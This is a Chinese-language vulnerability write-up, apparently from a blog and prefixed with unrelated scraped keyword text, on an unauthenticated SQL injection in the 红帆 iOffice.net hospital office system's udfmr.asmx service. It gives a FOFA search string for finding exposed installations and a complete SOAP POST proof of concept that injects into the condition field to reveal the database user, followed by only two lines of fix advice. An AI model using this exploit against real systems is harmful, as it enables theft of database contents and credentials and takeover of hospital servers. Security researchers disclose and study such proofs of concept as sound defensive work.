网站建设方案计划书人员规划,软件商店安装免费下载,wordpress百度,湘潭网络公司网站建设0x01 产品简介 红帆iOffice.net从最早满足医院行政办公需求#xff08;传统OA#xff09;#xff0c;到目前融合了卫生主管部门的管理规范和众多行业特色应用#xff0c;是目前唯一定位于解决医院综合业务管理的软件#xff0c;是最符合医院行业特点的医院综合业务管理平…0x01 产品简介  红帆iOffice.net从最早满足医院行政办公需求传统OA到目前融合了卫生主管部门的管理规范和众多行业特色应用是目前唯一定位于解决医院综合业务管理的软件是最符合医院行业特点的医院综合业务管理平台是成功案例最多的医院综合业务管理软件。 0x02 漏洞概述 红帆iOffice.net udfmr.asmx接口处存在SQL注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。 0x03 复现环境 FOFAapp红帆-ioffice 0x04 漏洞复现 http://your-ip/iOffice/prg/set/wss/udfmr.asmx?opGetEmpSearch 出现以上这种情况则可能存在漏洞 PoC POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1 Host: your-ip Content-Type: text/xml; charsetutf-8 SOAPAction: http://tempuri.org/ioffice/udfmr/GetEmpSearch?xml version1.0 encodingutf-8? soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodyGetEmpSearch xmlnshttp://tempuri.org/ioffice/udfmrcondition1user_name()/condition/GetEmpSearch/soap:Body /soap:Envelope 查询当前数据库用户  0x05 修复建议 限制访问来源地址如非必要不要将系统开放在互联网上。 升级至安全版本或打补丁。